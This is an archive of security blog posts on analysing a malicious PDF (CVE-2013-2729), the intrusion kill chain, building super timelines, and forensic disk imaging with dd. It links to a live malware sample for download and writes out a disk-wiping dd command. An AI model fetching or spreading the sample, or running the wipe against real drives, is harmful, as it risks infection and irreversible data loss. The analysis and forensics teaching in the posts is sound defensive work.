Author Archives: Luis Rocha

Malicious Documents – PDF Analysis in 5 steps


Mass mailing and targeted campaigns that use common file formats to host or exploit malicious code have been, and remain, a very popular attack vector: for example, a malicious PDF or MS Office document received via e-mail or opened through a browser plug-in. In the case of malicious PDF files, the security industry saw a significant increase in vulnerabilities after the second half of 2008, which might be related to Adobe Systems' release of the specifications, format structure and functionality of PDF files.

Most enterprise network perimeters are protected and contain several security filters and mechanisms that block threats. However, a malicious PDF or MS Office document might be very successful at passing through firewalls, intrusion prevention systems, anti-spam, anti-virus and other security controls. Once it reaches the victim's mailbox, this attack vector leverages social engineering techniques to lure the user into clicking/opening the document. Then, for example, if the user opens a malicious PDF file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap, leading it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability could even be exploited without opening the file, just by having the malicious file on the hard drive, as described by Didier Stevens.

From a 100-foot view a PDF file is composed of a header, body, cross-reference table and trailer. One key component is the body, which might contain all kinds of content-type objects that make parsing attractive for vulnerability researchers and exploit developers. The format is very rich and complex, which means the same information can be encoded and obfuscated in many ways. For example, within objects there are streams that can be used to store data of any type or size. These streams are compressed, and the PDF standard supports several algorithms, called filters, including ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode and DCTDecode. PDF files can contain multimedia content and support JavaScript, and ActionScript through Flash objects. JavaScript is a popular attack vector because it can be hidden in the streams using different techniques, making detection harder. When a PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and execute shellcode. All these features and capabilities translate into a huge attack surface!

From a security incident response perspective, knowing how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of file, an incident handler can determine the worst it can do, its capabilities and its key characteristics. Furthermore, it helps the team be better prepared to identify future security incidents and to contain, eradicate and recover from those threats.

So, which steps could an incident handler or malware analyst perform to analyze such files?

In the case of a malicious PDF file there are 5 steps. Using the REMnux distro, the steps are described by Lenny Zeltser as:

  1. Find and extract JavaScript
  2. Deobfuscate JavaScript
  3. Extract the shellcode
  4. Create a shellcode executable
  5. Analyze the shellcode and determine what it does.

A summary of the tools and techniques for analyzing malicious documents with REMnux is described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and to illustrate an introduction to the tools and techniques, below is the analysis of a malicious PDF using these steps.

The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of the Adobe Reader JavaScript engine to exploit CVE-2013-2729. This vulnerability, found by Felipe Manzano, is an integer overflow in several versions of Adobe Reader when parsing BMP files compressed with RLE8 and embedded in PDF forms. On VirusTotal the file was detected by only 6 of 55 AV engines. Let's go through each one of the mentioned steps to find information about the malicious PDF's key characteristics and capabilities.

1st Step – Find and extract JavaScript

One technique is to use Didier Stevens' suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is pdfid, which shows counts of several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contains some of these keywords. In this case the first observation shows the PDF file contains 6 objects and 2 streams. No JavaScript is mentioned, but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms, which might indicate it is malicious.
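
As a rough sketch, and assuming the sample was saved as suspicious.pdf (a hypothetical name), the keyword scan boils down to a single command on REMnux:

# count risky keywords such as /JS, /JavaScript, /AcroForm and /XFA
pdfid.py suspicious.pdf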

[Screenshot: pdfid output for the malicious PDF]


Then, looking deeper, we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity, but in this case Object 2 is the /XFA element, which references Object 1, and Object 1 contains a compressed and rather suspicious stream.

[Screenshot: pdf-parser.py output listing the PDF objects]

Following this indicator, pdf-parser.py allows us to show the contents of an object and pass the stream through one of the supported filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) via the --filter switch. The --raw switch makes the output easier to read. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren't visible in the original PDF file. If this document is opened by a victim, the /XFA keyword will cause this malicious code to be executed.
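
A hedged example of what that command can look like, with hypothetical file names and assuming the suspicious stream lives in object 1 as above:

# decode object 1, apply the stream filter and keep the raw output for later analysis
pdf-parser.py --object 1 --filter --raw suspicious.pdf > object.raw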

[Screenshot: decompressed stream showing the hidden JavaScript]

Another fast way to find out whether the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files that helps show objects/streams, encode/decode streams, modify them, obtain different versions, show and modify metadata, and execute JavaScript and shellcode. When running the malicious PDF file against the latest version of the tool, it can show very useful information about the PDF structure and its contents, and it can even detect which vulnerability the file triggers if it has a signature for it.
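
As an illustrative sketch (file name hypothetical), a basic scan and the interactive console look like this; the -f switch tells peepdf to ignore parsing errors, which malformed samples often provoke:

peepdf.py -f suspicious.pdf
peepdf.py -i suspicious.pdf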

[Screenshot: peepdf.py output for the malicious PDF]

2nd Step – Deobfuscate JavaScript

The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation, and in this case quite some manual cleanup of the extracted code was needed just to get the code isolated. The object.raw file contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format inside an <image> tag. The JavaScript code between the tags needs to be extracted and placed into a separate file. The same can be done for the chunk of base64 data, which, when decoded, produces a 67MB BMP file. The JavaScript in this case was rather cryptic, but there are tools and techniques that help interpret and execute the code. Here I used another tool called js-didier.pl, which is Didier's version of the SpiderMonkey JavaScript interpreter. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows running and analyzing malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and print the results into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup, but it was enough to produce several eval log files with interesting results.
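
As a minimal sketch, assuming the cleaned-up code was saved as extracted.js (a hypothetical name):

# run the script in the stand-alone interpreter and check what it tried to eval()
js-didier.pl extracted.js
ls eval.0*.log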

[Screenshot: deobfuscated JavaScript written to the eval log files]

3rd Step – Extract the shellcode

The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. Among other things, the file contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode; you will typically find shellcode in JavaScript encoded this way.

[Screenshot: Unicode-encoded shellcode strings in the deobfuscated JavaScript]

These Unicode-encoded strings need to be converted into binary. To do this, isolate the Unicode-encoded strings into a separate file and convert the Unicode (\u) notation to hex (\x) notation. This can be done with a series of Perl regular expressions wrapped in a REMnux script called unicode2hex-escaped. The resulting file will contain the shellcode in hex format (“\xeb\x06\x00\x00..”), which will be used in the next step to turn it into a binary.
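
A hedged sketch of that conversion, assuming the script reads standard input and with hypothetical file names:

# rewrite \uXXXX escapes as \x.. byte escapes
cat shellcode-unicode.txt | unicode2hex-escaped > shellcode-hex.txt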

[Screenshot: shellcode converted to hex (\x) notation]


4th Step – Create a shellcode executable

Next, with the shellcode encoded in hexadecimal format, we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py, written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states: “The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine it. This approach is useful for analyzing shellcode that’s difficult to understand without stepping through it with a debugger.”
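
A sketch of the invocation, assuming the -s switch accepts string-formatted (“\x..”) shellcode as listed in the REMnux cheat sheet, and with a hypothetical input file name:

# wrap the escaped shellcode in a small executable so it can be run under a debugger
shellcode2exe.py -s shellcode-hex.txt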

[Screenshot: shellcode2exe.py creating the executable]


5th Step – Analyze shellcode and determine what it does

The final step is to determine what the shellcode does. To analyze the shellcode you could use a disassembler or a debugger. In this case a quick static analysis with the strings command shows several API calls used by the shellcode. It also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed.
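
For illustration only (the executable name is hypothetical), ASCII and 16-bit little-endian strings can be pulled from the generated binary like this; the second form often reveals API names and URLs stored as wide strings:

strings -a shellcode.exe
strings -a -e l shellcode.exe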

[Screenshot: strings output showing API calls and the download URL]


We now have a strong IOC that can be used to take additional steps to hunt for evil and defend the network. This URL can be used as evidence and to identify machines that have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there, but it is known to be a variant of the Gameover Zeus malware.

The steps followed are manual, but with practice they are repeatable. They represent only a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 steps that can be used as a framework to discover indicators of compromise that will reveal machines compromised by the same bad guys. Using these 5 steps, many other questions could also be answered. With the mentioned and other tools and techniques, we can gain a better practical understanding of how malicious documents work and which methods are used by Evil. Two great resources for this type of analysis are the Malware Analyst’s Cookbook: Tools and Techniques for Fighting Malicious Code book from Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques course authored by Lenny Zeltser.

Download link for the malicious PDF file: https://0x0.st/sZyY.zip . MD5: 4f275c936b0772c969b2daf4688b7fc9
Password: infected


Intelligence driven Incident Response

Back in March 2011, Eric Hutchins, Michael Cloppert and Dr. Rohan Amin from Lockheed Martin (US Gov defense contractor) released a paper named Intelligence Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains. This was a great contribution to the IT security community because it describes a novel way to deal with intrusions. They claim that current tools and models that deal with intrusions need to evolve, mainly for two reasons. First, network defense tools focus on the vulnerability component of risk instead of the threat. Second, the traditional way of doing incident response happens only after a successful intrusion. To solve this problem they propose a model that leverages an understanding of the tools and techniques used by the attackers, creating intelligence that is then used to decrease the likelihood of a successful intrusion. In order to understand the threat actors, their tools and their techniques, they adopted models and terms that have their origins in the US military. Essentially they propose to map the steps taken by attackers during an intrusion. These steps are then intersected with a chain of events, with the goal of detecting, mitigating and responding to intrusions based on knowledge of the threat, using indicators, patterns and behaviors observed during the course of the intrusion.

To map the attackers' activity the authors propose an intelligence-gathering element called an indicator, which is divided into three types:

  • Atomic – Atomic indicators are attributes relevant in the context of the intrusion and cannot be further divided into smaller parts. Examples include IP addresses, email addresses, DNS names.
  • Computed – Computed indicators are digital representations of data pertinent to the intrusion or patterns identified with regular expressions. Examples include hashes of malicious files and regular expressions used on IDS.
  • Behavioral – Behavioral indicators are a combination of atomic and computed indicators through some kind of logic that outlines a summary of the attackers' tools and techniques. An example is well described by Mike Cloppert: “Bad guy 1 likes to use IP addresses in West Hackistan to relay email through East Hackistan and target our sales folks with trojaned word documents that discuss our upcoming benefits enrollment, which drops backdoors that communicate to A.B.C.D.’ Here we see a combination of computed indicators (Geolocation of IP addresses, MS Word attachments determined by magic number, base64 encoded in email attachments), behaviors (targets sales force), and atomic indicators (A.B.C.D C2)”

The phases to map the attacker activity are based on US DoD information operations doctrine, with its origins in Field Manual 100-6 from the Department of the Army. This systematic process evolved over the years and is also described in the Air Force Doctrine Document 2-1.9 (8 June 2006) as a kill chain, referred to in military language as the dynamic targeting process F2T2EA (Find, Fix, Track, Target, Engage, and Assess) or F3EAD (Find, Fix, Finish, Exploit, Analyze and Disseminate). The authors expanded this concept and presented a new kill chain model to deal with intrusions. The 7 phases of the cyber kill chain are:

  • Reconnaissance : Research, identification and selection of targets, often represented as crawling Internet websites such as conference proceedings and mailing lists for email addresses, social relationships, or information on specific technologies.
  •  Weaponization : Coupling a remote access trojan with an exploit into a deliverable payload, typically by means of an automated tool (weaponizer). Increasingly, client application data files such as Adobe PDF or Microsoft Office documents serve as the weaponized deliverable.
  •  Delivery : Transmission of the weapon to the targeted environment using vectors like email attachments, websites, and USB removable media.
  •  Exploitation : After the weapon is delivered to the victim host, exploitation triggers the intruders’ code. Most often, exploitation targets an application or operating system vulnerability, but it could also more simply exploit the users themselves or leverage an operating system feature that auto-executes.
  •  Installation : Installation of a remote access trojan or backdoor on the victim system allows the adversary to maintain persistence inside the environment.
  •  Command and Control (C2) : Typically, compromised hosts must beacon outbound to an Internet controller server to establish a C2 channel.
  •  Actions on Objectives : Only now, after progressing through the first six phases, can intruders take actions to achieve their original objectives. Typically this objective is data exfiltration which involves collecting, encrypting and extracting information from the victim environment. Alternatively, the intruders may only desire access to the initial victim box for use as a hop point to compromise additional systems and move laterally inside the network.

These phases are then used to produce a course of action matrix, modeled on a system used, once again, in military language for offensive information operations, with the aim to detect, deny, disrupt, degrade, deceive and destroy. The goal is to create a plan that degrades the attacker's ability to perform his steps and forces him to be reactive by interfering with the chain of events. This will slow the attacker's movements, disrupt their decision cycles and increase the cost of being successful. The following picture, taken from the original paper, illustrates the course of action matrix.

[Image: course of action matrix from the original paper]


This model is a novel way to deal with intrusions, moving from the traditional reactive posture to a more proactive system based on intelligence gathered through indicators that are observed throughout the phases. Normally the incident response process starts after the exploitation phase, putting defenders at a disadvantage. With this method defenders should be able to move their actions and analysis up the kill chain and interfere with the attackers' actions. The authors go even further to a more strategic level by stating that intruders reuse tools and infrastructure, and that they can be profiled based on the indicators. By leveraging this intelligence, defenders can analyze and map multiple intrusion kill chains over time and understand commonalities and overlapping indicators. This results in a structured way to analyze intrusions. By repeating this process one can characterize intruder activity by determining the tactics, techniques and procedures of how the attackers operate, i.e., perform a campaign analysis.

References and Further reading:

Mike Cloppert series of posts on security intelligence on the SANS Forensics Blog

Lockheed Martin Cyber Kill Chain

Sean Mason from GE on Incident Response


Hands on Training to develop cyber security skills

The demand for qualified security professionals who possess the required skills and relevant education is increasing substantially. However, the supply is not meeting the demand. The information security industry is growing in size, density and specialization. Across all businesses we need people who understand computer systems, networks and security. In order to help facilitate the growth of these information security skills, hands-on training (H.O.T.) can be used to make sure that our abilities have been tested in the most realistic way possible. This paper will show how to build an environment that represents real-world security issues and their respective flaws. Topics such as incident handling, intrusion analysis, system administration, network security, forensics or penetration testing can be taught and practiced. Among other objectives, the primary goal is to grow security expertise and awareness by using a low-cost, high-return and self-paced hands-on training method that allows us to understand attack methods in order to create effective defenses.

This is the abstract of my paper that was just released in the SANS reading room as part of my journey to get the GIAC GCIH gold certification. I started drafting the idea of writing a paper last October. The experience was interesting, sometimes frustrating and long, but with lots of fun. Essentially, I prepared all my ideas in the lab and practiced the different scenarios I wanted to share so they would be repeatable and consistent enough to be documented. In parallel I started to write notes, do research and find references. Around last December I submitted the first draft to SANS. They accepted the paper and assigned an advisor to work with me. From that moment onwards I had a deadline of 6 months. There followed a series of back-and-forth exchanges with the advisor. I must admit that Dr. Johannes Ullrich from SANS was very supportive, responsive and a great mentor during the whole process. I also would like to thank Angel Parrizas for his constructive feedback during the paper's creation and his thoughts on the structure, Michael Bem for his help with the opening language, Grzegorz Drozda for his SQL kung-fu at the beginning and, finally, my family, who had a lot of patience to deal with the long hours at the computer.

My biggest challenge was the language in terms of structure, phrasing, diction, subject-verb agreement and tense, since English is a second language for me. I believe that to create a paper like this you need strong motivation, willingness, persistence and family support, but it is a rewarding experience that allowed me to share my experiences, learn, reinforce my knowledge and contribute to the community. I definitely recommend this exercise to anyone who is involved in the security industry.

The paper is available here!


Forensics Evidence Processing – Super Timeline

After evidence acquisition, you normally start your forensics analysis and investigation by doing a timeline analysis. This is a crucial step and very useful because it includes information on when files were modified, accessed, changed and created in a human-readable format, known as MAC time evidence. This activity helps establish when a particular event took place and in which order. The traditional timeline analysis is done against the file system, has been used for several years, and folks like Rob Lee and others have been championing it for years. The data is gathered using a variety of tools, extracted from the metadata layer of the file system (inodes on Linux or MFT records on Windows) and then parsed and sorted in order to be analyzed. The end goal is to generate a snapshot of the activity done in the system including its date, the artifact involved, the action and the source. The creation is an easy process but the interpretation is hard. During the interpretation it helps to be meticulous and patient, and it helps if you have comprehensive knowledge of file systems and operating system artifacts. To accomplish this step several commercial or open source tools exist, such as the SANS Investigate Forensic Toolkit (SIFT) that is freely available and frequently updated.
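
As a hedged sketch of that traditional file system timeline on the SIFT workstation, using The Sleuth Kit and hypothetical file names (add -o with the partition's sector offset if the image is a full-disk image):

# walk the file system metadata into a body file, then sort it into a CSV timeline
fls -r -m C: suspect.img > bodyfile
mactime -b bodyfile -d > fs-timeline.csv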

In June 2010, the SANS reading room published a paper by Kristinn Gudjonsson, as part of his GCFA gold certification, introducing a new method called the super timeline and a tool called log2timeline. The super timeline goes beyond the traditional file system timeline created from metadata extracted from acquired images by extending it with more sources of data in an automated fashion. As stated in Kristinn's paper, the super timeline includes more artifacts that provide vital information to the investigation. Basically the super timeline is a timeline of timelines, gathered from the file system, registry keys and Windows artifacts, producing a single correlated timeline. To create the super timeline, Kristinn originally developed a framework that is materialized in the log2timeline tool written in Perl. The tool uses a modular approach that makes it easier for someone to contribute to the project by developing a new module, for example a new parser for a specific Windows artifact. The first release introduced several parsers for Windows artifacts, such as the ability to create time-stamped data from Chrome, Firefox, Opera and Internet Explorer browser history, McAfee Antivirus log files, Open XML metadata used in Microsoft Office documents, PDF metadata, pcap network captures, the UserAssist registry key and others. log2timeline has been actively developed by Kristinn and others, and its backend is currently being replaced by a new framework named Plaso that still provides the log2timeline tool as a frontend along with many other tools written in Python.

In order to practice the production of a super timeline I created a realistic scenario consisting of a Windows XP system compromised by the W32/Morto worm simply by having the remote desktop service exposed to the Internet with a poor administrator password. Moments after being compromised the machine was taken offline and a bit-by-bit forensic image was created. The image was then moved to the SIFT workstation for analysis.

5 steps are needed to create the super timeline using the SIFT workstation and the log2timeline.py front-end tool from the Plaso suite.
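
Compressed into a rough sketch (file names hypothetical, options trimmed to the essentials), the core of those steps with the Plaso tools looks like this:

# extract events from the image into a Plaso storage file, then sort them into a log2timeline-style CSV
log2timeline.py plaso.dump suspect.img
psort.py -o l2tcsv plaso.dump > supertimeline.csv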

[Screenshot: the 5 steps used to create the super timeline]


Now, with the evidence sorted and reduced, I can start doing my analysis and investigation and look for signs of Evil using, for example, Excel. A piece of the super timeline is shown in the following picture.

[Screenshot: excerpt of the super timeline in CSV format]


The creation of a super timeline is an easy process and it applies to different Windows operating systems, but the interpretation is hard. During the interpretation it helps to be meticulous and patient, and it helps if you have comprehensive knowledge of file systems, operating system artifacts and the registry. With this type of methodology one can practice and improve the ability to determine past actions which have taken place and understand all kinds of artifacts which occur within the super timeline. On the SANS website there is another great article on how to create a super timeline with log2timeline. Here you can also view a 2011 webcast that looks at what super timeline analysis is and how to do it. These and other steps to create a super timeline are well detailed in the log2timeline cheat sheet created by David Nides. The analysis and investigation will be part of another post.


Evidence acquisition – Creating a forensic image

Following the identification phase of the incident handling process, where among other things you have identified malicious acts or deviations from normal operation, comes the containment phase. During the containment phase you want to stop the damage: stop the bleeding and pause the attacker in the quickest and most effective manner, without changing evidence and using a low-profile approach. There isn't a silver bullet for containment because every case is unique, but there are some strategies you can use. Some examples of short-term containment include disconnecting the network cable, redirecting the impacted system's DNS name to another IP address, creating a firewall rule or, if your infrastructure allows it, putting the system into a separate, isolated VLAN. During this process engage the business owners and decide the best approach. Do not gracefully shut down the system because it will destroy important evidence and artifacts and you will lose all your volatile data.

There are times when the incident handler is also gathering evidence to deliver to the forensics team, or does the forensics analysis as well. Depending on the case you might see an overlap between incident handling and forensics, but the processes and procedures go hand in hand. From a forensics perspective, create a forensic image of the affected system. This means gathering the file system using a disk imaging process and a memory dump (volatile data). You should start by gathering the volatile data, then do the disk image. With these elements you can do a thorough analysis of the data. During the forensic data analysis, among other things, you will look at the file system at bit level, analyzing several artifacts such as program execution, file downloads, file opening and creation, USB and drive usage, account usage, browser usage, etc.

Create a forensic image of the disk as soon as is practical. Make sure you use blank media in a pristine state to create a copy of the impacted system. This blank media, e.g., a USB hard drive, should be wiped. You clean and prepare the drive during the preparation phase; you do not want to be wiping drives while under fire! To do the disk image you should do a bit-by-bit image using your preferred toolkit. Don't use the tools from the compromised system because you cannot trust them; use binaries from another source. One example is the Linux-based toolkit Helix, which includes the dd tool that will assist you in creating the forensic image of the hard drive (the Helix product went commercial but you can still download the free 2009R3 version). Once you have created the image and ensured its integrity, it is good practice to record the time and the evidence creation method, including the image hash, in your incident handler notebook. If time allows, create more than one image. Most of the time you won't have time because image creation can take several hours. In that case make a duplicate offsite and do your analysis using the duplicate. Image creation is a simple task but you need to practice it.

The traditional way to image a hard drive is to remove it from the impacted system and create a forensic image using a write blocker. But sometimes this method is not practical. Another way of making a forensic image of the hard drive is to use live acquisition methods, boot disk acquisition or remote/enterprise-grade tools. A live system acquisition might be useful in cases where the affected drive is encrypted, where you have a RAID across multiple drives, or where it is not feasible to power down the machine. However, this method will only grab the logical part of the hard drive, i.e., partitions such as FAT, NTFS, EXT2, etc.

The other method is to use a bootable forensic distro such as Helix. You reboot the system and boot it from CD/USB. This allows you to create a bit-by-bit image of the physical drive, the evidence on the drive is not altered during the boot process, and you can write the image of the hard drive into an image file. This image file can then be used across different analysis tools and is easier to back up.

Let's look at a hands-on scenario of creating a forensic image from a compromised or suspicious system using the bootable disk method and dd. dd is a simple and flexible tool that is launched from the command line and is available for Windows and Linux. In this case we will run dd on a Linux system. All dd does is copy chunks of raw data from one input source to an output destination; it knows nothing about partitions or file systems. dd reads from the input source specified by the if= option in blocks (512 bytes of data by default) and writes the data to the output destination specified by the of= option.

We start by using dd to prepare a target hard drive. We will wipe the data of the hard drive that we will be using to gather the evidence, using dd to zeroize a 320GB USB drive. This will render the drive sterile and in a pristine state. Plug the USB drive into a Linux system and execute fdisk -lu to display the available drives on the system. In this case we have 2 drives: /dev/sda, which is the internal hard drive of the system, and /dev/sdb, which is the 320GB drive that we plugged into the system. The /dev/sdb drive does not contain any valid partitions, and this is OK for now because we only want to wipe it.

root@ubuntu:~# fdisk -lu
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders, total 312581808 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x0006784f
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048      206847      102400    7  HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2          206848   312578047   156185600    7  HPFS/NTFS
 
Disk /dev/sdb: 320.0 GB, 320072933376 bytes
255 heads, 63 sectors/track, 38913 cylinders, total 625142448 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x00000000
Disk /dev/sdb doesn't contain a valid partition table

Next, execute dd specifying the special file /dev/zero as input and /dev/sdb as the output drive, using a block size of 8k to increase the speed of the process. This will write zeros across the entire drive. Be careful with this command and make sure you are wiping the right drive. On our system this process took more than 3 hours to complete.

root@ubuntu:~# dd if=/dev/zero of=/dev/sdb bs=8k
dd: writing `/dev/sdb': No space left on device
39071404+0 records in
39071403+0 records out
320072933376 bytes (320 GB) copied, 11579.9 s, 27.6 MB/s


The “No space left on device” error is normal. Also note that the number of records in and out multiplied by the block size (8192) will get you the number of bytes copied.

To confirm that the drive has been zeroized you can dump the contents using xxd.

root@ubuntu:~# cat /dev/sdb | xxd | more
0000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................


We have now prepared our media for the acquisition process. With pristine media available we can make our forensic image. Boot the Helix CD on the target/compromised system and plug in the USB media. Then create an EXT2 file system using fdisk and mke2fs.

root@ubuntu:~# fdisk /dev/sdb
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0x7b441f7a.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
The number of cylinders for this disk is set to 38913.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
   (e.g., DOS FDISK, OS/2 FDISK)
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
Command (m for help): m
Command action
   a   toggle a bootable flag
   b   edit bsd disklabel
   c   toggle the dos compatibility flag
   d   delete a partition
   l   list known partition types
   m   print this menu
   n   add a new partition
   o   create a new empty DOS partition table
   p   print the partition table
   q   quit without saving changes
   s   create a new empty Sun disklabel
   t   change a partition's system id
   u   change display/entry units
   v   verify the partition table
   w   write table to disk and exit
   x   extra functionality (experts only) 
Command (m for help): p
Disk /dev/sdb: 320.0 GB, 320072933376 bytes
255 heads, 63 sectors/track, 38913 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x7b441f7a
   Device Boot      Start         End      Blocks   Id  System
Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4) p
 
Partition number (1-4): 1
First cylinder (1-38913, default 1):
Using default value 1
Last cylinder or +size or +sizeM or +sizeK (1-38913, default 38913):
Using default value 38913
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
 
root@ubuntu:~# mke2fs /dev/sdb1
 
mke2fs 1.40.8 (13-Mar-2008)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
19537920 inodes, 78142160 blocks
3907108 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=0
2385 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
       32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
       4096000, 7962624, 11239424, 20480000, 23887872, 71663616
Writing inode tables: done                           
Writing superblocks and filesystem accounting information: done
This filesystem will be automatically checked every 25 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.
 
root@ubuntu:~# fdisk -lu
 
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders, total 312581808 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x0006784f
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048      206847      102400    7  HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2          206848   312578047   156185600    7  HPFS/NTFS
 
Disk /dev/sdb: 320.0 GB, 320072933376 bytes
255 heads, 63 sectors/track, 38913 cylinders, total 625142448 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x7b441f7a
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1              63   625137344   312568641   83  Linux

 

fdisk created a partition that uses the entire disk and mke2fs created the file system (note the command runs on /dev/sdb1). Finally, fdisk -lu confirms that the new partition was created (Id 83, Linux). The next step is to mount the file system by creating a mount point and then mounting the partition.

root@ubuntu:~# mkdir /mnt/target
root@ubuntu:~# mount /dev/sdb1 /mnt/target

Then we are ready to start our bit-by-bit image creation. This method will gather the allocated space, unallocated space, slack space and bad blocks. This means it will grab all the sectors of the hard drive from the MBR to the final sector, including the Host Protected Area (HPA) if it exists.

Start by creating a cryptographic fingerprint of the original disk using MD5. This will be used to verify the integrity of the duplicate. Then run dd with /dev/sda as the input source and a file named suspect.img as the output. Another useful option is conv=sync,noerror, which avoids stopping the image creation when an unreadable sector is found: with this option dd will skip over the unreadable section (noerror) and pad the output (sync). Finally, create the fingerprint of the image, verify that both fingerprints match and unmount the drive.

root@ubuntu:~# md5sum /dev/sda > /mnt/target/suspect.md5
root@ubuntu:~#dd if=/dev/sda of=/mnt/target/suspect.img conv=sync,noerror bs=8k
19536363+0 records in
19536363+0 records out
160041885696 bytes (160 GB) copied, 5669.92 s, 28.2 MB/s
root@ubuntu:~#md5sum /mnt/target/suspect.img > /mnt/target/suspect.img.md5
root@ubuntu:~# cat /mnt/target/*.md5
6a5346b9425925ed230e32c9a0b510f7  /mnt/target/suspect.img
6a5346b9425925ed230e32c9a0b510f7  /dev/sda
root@ubuntu:~# umount /mnt/target/

The creation of the image is a simple process but you should practice it. Under fire it is much harder to accomplish this type of activity. It is also a process that can take several hours; in our case it took around 90 minutes, and the integrity check took around the same time. With these steps we created a forensically sound, bit-by-bit image of a hard drive and ensured its integrity.

Now that we have collected a forensic image, we could start our forensic investigation by doing an in-depth analysis of the file system and analyzing several artifacts such as program execution, file downloads, file opening and creation, USB and drive usage, account usage, browser usage, etc. To do this we could use the SANS Investigative Forensic Toolkit (SIFT) and start practicing tools and techniques to discover evidence and tracks left by the suspect. During our investigation we might want to gather data to answer questions such as:

How did the attacker gain entry?
What is the latest evidence of attacker activity?
What actions did the attacker execute on the system?
How did the attacker maintain access to the environment?
What tools has the attacker deployed?
What accounts did the attacker compromise?


References:

SANS Forensics 508 – Advanced Computer Forensic Analysis and Incident Response


Computer Forensics and Investigation Methodology – 8 steps

Accepted methods and procedures to properly seize, safeguard and analyze data and determine what happened. Actionable information to deal with computer forensic cases. Repeatable and effective steps. That is a good way to describe the SANS methodology for IT forensic investigations put together by Rob Lee and many others. It is an 8-step methodology. It helps the investigator stay on track and assures proper presentation of computer evidence for criminal or civil cases in court, legal proceedings and internal disciplinary actions, as well as the handling of malware incidents and unusual operational problems. Furthermore, it is a good starting point for gaining a reasonable knowledge of forensic principles, guidelines, procedures, tools and techniques.

The purpose of these 8 steps is to respond systematically to forensic investigations and determine what happened. A similar process was created by NIST in the Guide to Integrating Forensic Techniques into Incident Response (pub. #: 800-86), published in 2006. This special publication is consistent with the SANS methodology and reflects the same basic principles, differing in the granularity of each phase and the terms used. Other similar methodologies are described in ISO 27041.

It is also important to consider that a computer forensic investigation goes hand in hand with computer incident handling and normally branches off from the containment phase.

Below a short and high level introduction of the 8 Computer Forensic Investigation steps:

Verification: Normally the computer forensics investigation will be done as part of an incident response scenario, so the first step should be to verify that an incident has taken place. Determine the breadth and scope of the incident and assess the case: what is the situation, the nature of the case and its specifics. This preliminary step is important because it will help determine the characteristics of the incident and define the best approach to identify, preserve and collect evidence. It might also help justify to business owners taking a system offline.

